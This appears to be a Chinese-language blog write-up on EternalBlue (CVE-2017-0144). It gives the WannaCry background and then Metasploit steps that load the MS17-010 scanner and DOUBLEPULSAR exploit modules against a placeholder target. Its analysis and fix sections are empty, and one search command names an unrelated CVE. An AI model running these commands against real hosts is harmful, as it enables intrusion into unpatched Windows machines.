CVE-2017-0144 Investigation

在 2017 年——「网络安全元年」——横空出世的大量高危 0day 漏洞中，最具代表性的无疑是 CVE-2017-0144，又称「永恒之蓝 Eternal Blue」漏洞。2016 年黑客组织 Shadow Brokers 入侵了 NSA 旗下的黑客组织 Equation Group，并拿到了后者部分泄密武器。在拿到武器后 Shadow Brokers 本打算以 100 万比特币的价格将其出售，但无人支付这笔添加费用。2017 年 4 月 14 日，Shadow Broker 公开了其武器库，大量针对 Windows 0day 漏洞的攻击武器被公开，其中就包含了 Eternal Blue 的 exploit。2017 年 5 月 12 日，不法分子通过改造 Eternal Blue 的 exploit 研制了「WannaCry」勒索病毒。该病毒在全球范围内迅速扩散，攻击并感染了超过 20 万台计算机，影响了至少 150 个国家的数千家机构，包括医院、银行、电信、ISP 等关键基础设施，造成了巨大的经济损失和社会混乱。这场网络灾难因为其传播范围之广，影响之巨，破坏之大，性质之恶劣而成为了 21 世纪网络安全领域的标志性事件和里程碑。

背锅侠微软其实在 2017 年 3 月 14 日就推送了 MS17-010 的安全补丁，却依旧没能阻止两个月后的病毒肆虐。显然这一影响深远的网络安全事件的根本原因并不单单是软件安全技术上的问题。

影响范围

The SMBv1 server in
Microsoft Windows Vista SP2
Windows Server 2008 SP2 and R2 SP1
Windows 7 SP1; Windows 8.1
Windows Server 2012 Gold and R2
Windows RT 8.1
Windows 10 Gold, 1511, and 1607
Windows Server 2016

漏洞分析

漏洞利用

使用 MSF 扫描该漏洞

1
2
3

msfconsole
msf6 > search scanner eternalblue

搜索结果

Matching Modules
================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_ms17_010  .                normal  No     MS17-010 SMB RCE Detection
   1    \_ AKA: DOUBLEPULSAR              .                .       .      .
   2    \_ AKA: ETERNALBLUE               .                .       .      .


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/smb/smb_ms17_010

调用扫描器并查看扫描器详情

1 2	msf6 exploit(windows/smb/smb_doublepulsar_rce) > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > info

扫描器详情信息

       Name: MS17-010 SMB RCE Detection
     Module: auxiliary/scanner/smb/smb_ms17_010
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Luke Jennings

Check supported:
  No

Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  CHECK_ARCH   true              no        Check for architecture o
                                           n vulnerable hosts
  CHECK_DOPU   true              no        Check for DOUBLEPULSAR o
                                           n vulnerable hosts
  CHECK_PIPE   false             no        Check for named pipe on
                                           vulnerable hosts
  NAMED_PIPES  /usr/share/metas  yes       List of named pipes to c
               ploit-framework/            heck
               data/wordlists/n
               amed_pipes.txt
  RHOSTS                         yes       The target host(s), see
                                           https://docs.metasploit.
                                           com/docs/using-metasploi
                                           t/basics/using-metasploi
                                           t.html
  RPORT        445               yes       The SMB service port (TC
                                           P)
  SMBDomain    .                 no        The Windows domain to us
                                           e for authentication
  SMBPass                        no        The password for the spe
                                           cified username
  SMBUser                        no        The username to authenti
                                           cate as
  THREADS      1                 yes       The number of concurrent
                                            threads (max one per ho
                                           st)

Description:
  Uses information disclosure to determine if MS17-010 has been patched or not.
  Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.
  If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does
  not have the MS17-010 patch.

  If the machine is missing the MS17-010 patch, the module will check for an
  existing DoublePulsar (ring 0 shellcode/malware) infection.

  This module does not require valid SMB credentials in default server
  configurations. It can log on as the user "\" and connect to IPC$.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
  https://github.com/countercept/doublepulsar-detection-script
  https://web.archive.org/web/20170513050203/https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Also known as:
  DOUBLEPULSAR
  ETERNALBLUE


View the full module info with the info -d command.

搜索该漏洞的 exp

1	msf6 > search CVE-2010-3333

搜索结果

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   11    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   12    \_ AKA: ETERNALBLUE                          .                .        .      .
   13  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   14    \_ target: Execute payload (x64)             .                .        .      .
   15    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 15, use 15 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

调用该模块并查看模块详情

1 2	msf6 > use exploit/windows/smb/smb_doublepulsar_rce msf6 exploit(windows/smb/smb_doublepulsar_rce) > info

模块详情信息

       Name: SMB DOUBLEPULSAR Remote Code Execution
     Module: exploit/windows/smb/smb_doublepulsar_rce
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2017-04-14

Provided by:
  Equation Group
  Shadow Brokers
  zerosum0x0
  Luke Jennings
  wvu <wvu@metasploit.com>
  Jacob Robles

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Execute payload (x64)
      1   Neutralize implant

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https:
                                     //docs.metasploit.com/docs/usi
                                     ng-metasploit/basics/using-met
                                     asploit.html
  RPORT   445              yes       The SMB service port (TCP)

Payload information:
  Space: 3316

Description:
  This module executes a Metasploit payload against the Equation Group's
  DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

  While this module primarily performs code execution against the implant,
  the "Neutralize implant" target allows you to disable the implant.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
  https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/
  https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/
  https://github.com/countercept/doublepulsar-detection-script
  https://github.com/countercept/doublepulsar-c2-traffic-decryptor
  https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1

Also known as:
  DOUBLEPULSAR

Related modules:
  auxiliary/scanner/smb/smb_ms17_010
  exploit/windows/smb/ms17_010_eternalblue


View the full module info with the info -d command.

使用该模块/扫描器

1 2	set RHOSTS TARGET_IP run

Exploit 分析

漏洞修复

Reference

Microsoft Security Bulletin MS17-010 - Critical
NVD - CVE-2017-0144
CVE - CVE-2017-0144

7erry's Website